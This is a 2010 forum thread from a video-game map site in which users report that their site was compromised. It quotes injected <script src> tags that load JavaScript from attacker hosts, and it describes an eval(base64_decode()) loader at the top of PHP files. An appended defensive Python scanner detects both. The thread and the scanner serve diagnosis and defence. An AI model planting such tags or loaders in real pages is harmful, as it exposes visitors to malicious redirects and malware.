VGMaps
Author Topic: My anti virus program keeps saying there's a virus here.  (Read 17156 times)
Peardian
« Reply #15 on: May 03, 2010, 10:48:22 AM »

Unless you've reuploaded it, I can see yours just fine.


It seems almost all of the attachments in the Platinum thread are corrupted, so I'm wondering if it didn't corrupt almost all images.
MM (10%) - SMA3 (33%) - DNS (0%)

Come check out the Nintendo 64 Mapping Workshop!
Revned
« Reply #16 on: May 03, 2010, 11:12:11 AM »

Maybe your browser attempts to display the corrupted PNG where mine just gives up. I saved it to my hard drive and none of my viewers will display it.
JonLeung
« Reply #17 on: May 03, 2010, 11:22:56 AM »

I recently backed up the attachments (a few days ago - but don't think that's related - or at least I hope not), so shouldn't reuploading the contents of the "attachments" folder fix them?  When I get home I'll give that a shot.

Though I'm more concerned about something more critical or irreplaceable being corrupted, and if whatever's causing the corruption is still around.
« Last Edit: May 03, 2010, 11:24:43 AM by JonLeung »
Peardian
« Reply #18 on: May 03, 2010, 01:26:15 PM »

Quote from: Revned on May 03, 2010, 11:12:11 AM
Maybe your browser attempts to display the corrupted PNG where mine just gives up. I saved it to my hard drive and none of my viewers will display it.

Oh, NOW it's broken. I hate the way this browser uses its cache.
bustin98
« Reply #19 on: May 03, 2010, 03:34:50 PM »

As long as the site is on a shared server, the possibility of this happening again is always going to exist. And it's not a matter of forum software, just a matter of root security. The problem was that a script pasted eval(base64(decode()) into every page in the forum. I'm surprised it didn't go higher into the main site, but it may have just been targeting the forum itself.
Revned
« Reply #20 on: May 12, 2010, 12:08:41 AM »

It has happened again :(
Maxim
« Reply #21 on: May 12, 2010, 02:20:13 AM »

The bottom of the page contains:

<script src="http://holasionweb.com/oo.php"></script>

...which serves some javascript that uses a cookie to redirect once to suitcase52td.net which is totally blocked for me...
bustin98
« Reply #22 on: May 12, 2010, 06:26:20 AM »

Fixed
The Ultimate Koopa
« Reply #23 on: May 20, 2010, 01:48:39 PM »

Danger: AVG Active Surf-Shield has detected active threats on this page and has blocked access for your protection.
The page you are trying to access has been identified as a known exploit, phishing, or social engineering web site and therefore has been blocked for your safety. Without protection, such as that in the AVG Security Toolbar and AVG, your computer is at risk of being compromised, corrupted or having your identity stolen. Please follow one of the suggestions below to continue.

URL: losotrana.com/js.php
Name: Virus found JS/Redir

That's what I'm getting now.
TerraEsperZ
« Reply #24 on: May 20, 2010, 02:03:27 PM »

Same thing for me. Every page on the forum causes Avast to report that trojan horse...
Current project that I really should try to finish:
-Drill Dozer (GBA)
-Sonic 3D Blast (Genesis)
-Naya's Quest (PC)
-Lilly Looking Through (PC)

Pending project:
-A ton of stuff that will never be finished
Revned
« Reply #25 on: May 20, 2010, 02:37:02 PM »

I'm of the opinion that the problem isn't that this site is on a shared server, but that something is attacking externally. None of this was happening until the captcha was changed, and only the forums are targeted. If the server admins are worth anything they keep each site in private directories.

[EDIT] Never mind, it appears that it definitely is a problem with GoDaddy. Lots of other people with different software are experiencing this. I guess we'll just have to wait it out.

Just a thought -- if the base64_decode command is getting pasted at the very end of the php file, what if you (bustin98) just stick an exit() at the end? That way anything after that point will be ignored, should this happen again.
« Last Edit: May 20, 2010, 02:47:11 PM by Revned »
bustin98
« Reply #26 on: May 20, 2010, 06:31:01 PM »

It's at the beginning of the file. Wish there was something I could put in to kill it. I changed permissions on the files but that didn't do a thing, and it wouldn't if the source was above the basic web user. Need to just get off the shared server, or on one that has better security.
bustin98
« Reply #27 on: May 21, 2010, 10:19:28 PM »

Well, did a deep cleaning of the site, found a random file that may be the cause or a cause of the infection. Got rid of it. I also renamed the cookie name, so sorry about causing everyone to have to log back in... :D Seems the infection is self-replicating and all it had to do is get in once. Every time someone hit an infected page, it ran through the site and added the code if it didn't already exist.

Maybe now things can go back to normal.??
Logged
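
A defender-side check for the two artifacts reported in this thread (an `eval(base64_decode(` loader at the beginning of PHP files, and `<script src=...>` tags pointing at an unfamiliar host), given here as an added example that is not part of any post or of the site's own code. The function names, the `forum.example` allowlist and the three sample files are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# Loader shape quoted in the thread: eval() wrapped around base64_decode().
EVAL_B64 = re.compile(rb"eval\s*\(\s*base64_decode\s*\(", re.I)
# <script src="http(s)://host/..."> tags; the URL is captured for a host check.
SCRIPT_SRC = re.compile(rb"<script[^>]+src\s*=\s*[\"'](https?://[^\"']+)[\"']", re.I)

def scan_file(path, allowed_hosts, head_bytes=2048):
    """Return (kind, detail) findings for one file."""
    data = Path(path).read_bytes()
    findings = []
    m = EVAL_B64.search(data)
    if m:
        # The thread reports the code at the beginning of each file.
        where = "file-start" if m.start() < head_bytes else "body"
        findings.append(("eval-base64", where))
    for url in SCRIPT_SRC.findall(data):
        host = (urlparse(url.decode("latin-1")).hostname or "").lower()
        if host not in allowed_hosts:
            findings.append(("external-script", host))
    return findings

def scan_tree(root, allowed_hosts, exts=(".php", ".html", ".htm", ".js")):
    """Walk a web root and map relative path -> findings (clean files omitted)."""
    report = {}
    for p in sorted(Path(root).rglob("*")):
        if p.is_file() and p.suffix.lower() in exts:
            hits = scan_file(p, allowed_hosts)
            if hits:
                report[p.relative_to(root).as_posix()] = hits
    return report

def demo():
    """Build a constructed three-file web root and scan it."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "index.php").write_bytes(
            b"<?php eval(base64_decode('ZWNobyAxOw==')); ?>\n<?php echo 'forum'; ?>\n")
        (root / "clean.php").write_bytes(
            b"<?php echo 'ok'; ?>\n<script src=\"http://forum.example/theme.js\"></script>\n")
        (root / "footer.html").write_bytes(
            b"<p>bye</p>\n<script src=\"http://injected.example/ll.php\"></script>\n")
        return scan_tree(root, allowed_hosts={"forum.example"})

if __name__ == "__main__":
    for name, hits in demo().items():
        print(name, hits)
```

Because the posts describe the code being re-added whenever an infected page is hit, a scan like this is only meaningful when it covers the whole web root and is repeated after cleanup.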
marioman
« Reply #28 on: September 17, 2010, 04:56:55 PM »

It's happened again.  The following script has been added to the forum code.

<script src="http://myblindstudioinfoonline.com/ll.php"></script>

Those without reliable virus protection beware.
Peardian
« Reply #29 on: September 17, 2010, 06:32:23 PM »

Uh oh. For some reason, I'm not getting any kind of warning and nothing is happening. I hope this gets taken care of before something does.